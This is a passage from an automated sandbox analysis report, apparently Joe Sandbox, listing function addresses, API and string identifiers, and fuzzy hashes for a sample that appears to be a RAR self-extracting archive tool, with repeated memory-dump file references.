                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                • API String ID: 0-13699710
                                                                                                                                                                                                                                • Opcode ID: 6e68e50000319b4eebb2839910dcdd3d0876ffe75523bb5545768418df304233
                                                                                                                                                                                                                                • Instruction ID: 20ef29a77e247cded6773a9a49647bd9b5eb0f9134f634604f8bdbef2d1f59cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e68e50000319b4eebb2839910dcdd3d0876ffe75523bb5545768418df304233
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A81A432A1868259EB31DB29D5112F92392FF86384F4041B5D96D8B6CAFE2DE60FC744
                                                                                                                                                                                                                                Function 00007FF6FAA7E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                • String ID: csm$f
                                                                                                                                                                                                                                • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                • Instruction ID: 8a3b68047349bbac2fc7137e747a219e6920596bc585bce732736b1746be9e5a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0461A032A0964286EF24DB11E544A7A3791FB54B98F1485B0DE2A877CCFF3CEC4A8740
                                                                                                                                                                                                                                Function 00007FF6FAA3EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                • String ID: $ACL
                                                                                                                                                                                                                                • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                • Instruction ID: c34f75d4c9e1b6151a449c413ade45c4d6a01b9e1c4ec2f4d9961236cde24a77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4318271A19B8192E720DB11E4513EA63A4FB88784F804071EA9D836DAFF3DE61EC700
                                                                                                                                                                                                                                Function 00007FF6FAA27188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                                • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                                • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                • Instruction ID: 166e381b04dec4fa15cc15dd2a37ddccbdcb71f85aa6bc571aa2e9d314b8f692
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6217C21B0C64281E7519F16A94527962E1BF56BC0F5441B5EE7DC3AD8FF2CE65F8300
                                                                                                                                                                                                                                Function 00007FF6FAA6BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                • Instruction ID: 5c6f4f16b51ef08bfa2665717822e304f6fa4cd944cf8328015186120d4a8693
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F21E476A186418AE760CF69E580A9D77F0F748794F144062EE68D3B88EF39E9468F10
                                                                                                                                                                                                                                Function 00007FF6FAA824D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                • Instruction ID: 2fbbf4ee03afaa47b76f694e6444c8b4631a2dc420ec98597e076564bd9fe204
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F04421A1968281EF498B11F5542792360EF8C780F441079E96FC66D8EE3DD45E8700
                                                                                                                                                                                                                                Function 00007FF6FAA8C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                • Instruction ID: 72508f3df279a8b7954af307181bf2c234edc6fddc7142b7863a22033494e041
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32A1C162A0C7C296EB618F6094403B967A1AF44BA4F4846B5DA7D877C5FF3DE44A8B00
                                                                                                                                                                                                                                Function 00007FF6FAA87AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                • Instruction ID: 6a97b85c0a853eac2be056d4848eab349eadd13d1cbe351276db03d42d8274df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0081DBB2E5C68285F7229B6588806BD67B0BB44B88F4441B5DE2E937D5EF3CE44BC710
                                                                                                                                                                                                                                Function 00007FF6FAA87428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3659116390-0
                                                                                                                                                                                                                                • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                • Instruction ID: 07e1e8a92630b5b639499a4804b862e5f36df75a3042dbeb507fd9f184f704a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51C072E18A918AE711CF25D4443AD7BB0BB49B98F048175DE6E97AD8EF38D14AC700
                                                                                                                                                                                                                                Function 00007FF6FAA380C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 643171463-0
                                                                                                                                                                                                                                • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                • Instruction ID: 66ee5627eef27a309d7fd280259cf7295b8888bb91c58d793cc0535907da2bca
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41E721E0CB4242FB209B6099012B962A1BF49BE0F0403B5EABD977D5FE3DE44F8740
                                                                                                                                                                                                                                Function 00007FF6FAA869B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                                                                                • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                • Instruction ID: e3e34f2553a7d3fbda48ad0f4fb9a333cf4aa11229927b84cf04bf91b7a58316
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B41C021B1D68291FB558F02A9046B5A3E1BF08BD0F199575DD7E8B7C4FE3CE40A9340
                                                                                                                                                                                                                                Function 00007FF6FAA8DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
